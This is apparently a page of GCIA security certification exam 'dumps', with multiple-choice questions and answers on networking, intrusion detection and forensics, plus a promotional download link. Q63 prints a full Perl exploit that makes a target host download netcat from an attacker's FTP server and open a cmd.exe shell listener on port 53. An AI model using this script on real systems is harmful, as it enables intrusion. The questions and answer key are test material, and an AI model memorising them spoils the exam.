Free Instant Download NEW GCIA Exam Dumps (PDF & VCE):
Available on: https://www.exambible.com/GCIA-exam/


Q57. Which of the following is known as a message digest? 

A. Hash function 

B. Hashing algorithm 

C. Spider 

D. Message authentication code 

Answer: A


Q58. You work as a Network Administrator for McNeil Inc. The company's Windows 2000-based network is configured with Internet Security and Acceleration (ISA) Server 2000. You want to configure intrusion detection on the server. You find that the different types of attacks on the Intrusion Detection tab page of the IP Packet Filters Properties dialog box are disabled. What is the most likely cause? 

A. The PPTP through ISA firewall check box on the PPTP tab page of the IP Packet Filters Properties dialog box is not enabled. 

B. The Enable IP routing check box on the General tab page of the IP Packet Filters Properties dialog box is not selected. 

C. The Log packets from Allow filters check box on the Packet Filters tab page of the IP Packet Filters Properties dialog box is not enabled. 

D. The Enable Intrusion detection check box on the General tab page of the IP Packet Filters Properties dialog box is not selected. 

Answer: D


Q59. Which of the following techniques is used to identify attacks originating from a botnet? 

A. IFilter 

B. BPF-based filter 

C. Passive OS fingerprinting 

D. Recipient filtering 

Answer: C


Q60. For a host to have successful Internet communication, which of the following network protocols are required? You should assume that the users will not manually configure the computer in any way and that the measure of success will be whether the user can access Web sites after powering the computer and logging on. 

Each correct answer represents a complete solution. Choose all that apply. 

A. DNS 

B. HTTP/HTTPS 

C. DHCP 

D. NTP 

Answer: ABC


Q61. John works as a Network Administrator for DigiNet Inc. He wants to investigate failed logon attempts to a network. He uses Log Parser to detail out the failed logons over a specific time frame. He uses the following commands and query to list all failed logons on a specific date: 

    logparser.exe file:FailedLogons.sql -i:EVT -o:datagrid

    SELECT
        timegenerated AS LogonTime,
        extract_token(strings, 0, '|') AS UserName
    FROM Security
    WHERE EventID IN (529; 530; 531; 532; 533; 534; 535; 537; 539)
        AND to_string(timegenerated,'yyyy-MM-dd HH:mm:ss') like '2004-09%'

After investigation, John concludes that two logon attempts were made by using an expired account. Which of the following EventIDs refers to this failed logon? 

A. 532 

B. 531 

C. 534 

D. 529 

Answer: A


Q62. Which of the following is the correct order of digital investigations Standard Operating Procedure (SOP)? 

A. Request for service, initial analysis, data collection, data reporting, data analysis 

B. Initial analysis, request for service, data collection, data analysis, data reporting 

C. Initial analysis, request for service, data collection, data reporting, data analysis 

D. Request for service, initial analysis, data collection, data analysis, data reporting 

Answer: D


Q63. Adam, a malicious hacker, performs an exploit, which is given below: 

    #################################################################
    $port = 53;
    # Spawn cmd.exe on port X
    $your = "192.168.1.1";# Your FTP Server
    $user = "Anonymous";# login as
    $pass = 'noone@nowhere.com';# password
    #################################################################
    $host = $ARGV[0];
    print "Starting ...\n";
    print "Server will download the file nc.exe from $your FTP server.\n";
    system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
    print "Server is downloading ... \n";
    system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
    print "Press ENTER when download is finished ... (Have a ftp server)\n";
    $o=<STDIN>; print "Opening ...\n";
    system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
    #system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit? 

A. Creates a share called "sasfile" on the target system 

B. Opens up a SMTP server that requires no username or password 

C. Creates an FTP server with write permissions enabled 

D. Opens up a telnet listener that requires no username or password 

Answer: D


Q64. Which of the following statements about User Datagram Protocol (UDP) is true? 

A. It is a hardware protocol. 

B. It is a connectionless protocol. 

C. It is a tunneling protocol. 

D. It is a connection-oriented protocol. 

Answer: B